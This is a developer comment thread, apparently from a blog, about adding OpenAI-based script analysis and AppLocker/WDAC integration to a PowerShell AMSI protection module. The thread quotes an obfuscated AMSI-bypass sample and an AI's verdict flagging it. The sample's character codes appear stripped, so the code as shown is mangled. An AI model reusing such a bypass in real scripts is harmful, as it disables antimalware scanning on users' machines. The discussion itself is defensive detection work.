Hi Adam,
Hey mate. I don’t know if you will see this comment. I hope so. I’m adding AI functionality into PowerShell Protect to perform malware analysis based on reputation. I’m in the process of testing atm, however I’m getting issues with loading the configuration when running Test-PNPConfiguration. Did you have a tool/process that you used to hook a debugger into the AMSI?
Cheers,
Michael.
Never mind. I managed to get a local build running and was able to hook Visual Studio’s debugger into it.
That sounds super cool! I’ll have to check out your PR!
Cool beans… AMSI question for you. Did you manage to extract the user identity or the process id of the executing code? It seems that it’s possible based on this, but I wanted to get your thoughts on this.
My idea is to integrate PSP with AppLocker/WDAC, where scripts that meet the Applocker ruleset are skipped and rules that don’t meet that criteria then are handled by the AMSI. Coupled with OpenAI, this will make for a formidable module.
FYI: OpenAI Handling Amsi.fail obfuscated code:
You
Just the json, no explanation or usage. Analyze the following PowerShell Script for security risks. Simplify your response as a Boolean called 'result' and include a rating (scoring from bad to good) between 0 and 1. Just the json, no explanation or usage.
#Unknown - Force error
$Ag=$null;$meph=[$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).Runtime.InteropServices.Marshal]::AllocHGlobal((9076*8451/8451));$ikglrjc="+('pôãpcmmn'+'xzcõ').NormALiZe(ChaR+ChAr+CHaR+cHar+CHaR) -replace char+ChaR+CHar+ChaR+chaR+CHaR";[Threading.Thread]::Sleep(851);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(char+ChAR+cHAr+CHAr+CHAR+CHAR+chaR+CHAr+CHAr+ChAr+chAR)", "NonPublic,Static").SetValue($Ag, $null);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(cHar+CHAR+cHar+ChAR+cHaR+cHaR+chAr+CHAR+CHAR+cHAR+ChaR)", "NonPublic,Static").SetValue($null, [IntPtr]$meph);
Response:
result: True
rating: 1 (bad)
The PowerShell script appears to be obfuscated and contains multiple suspicious commands that could potentially be used for malicious purposes. The use of the AllocHGlobal method and the SetValue method with non-public, static fields are particularly concerning. Additionally, the script forces an error which could be used to hide its true purpose. Overall, this script should be treated as highly suspicious and potentially dangerous.
The AMSI provider loads directly into the process so you should be able to get the user identity and process ID by inspecting the current process.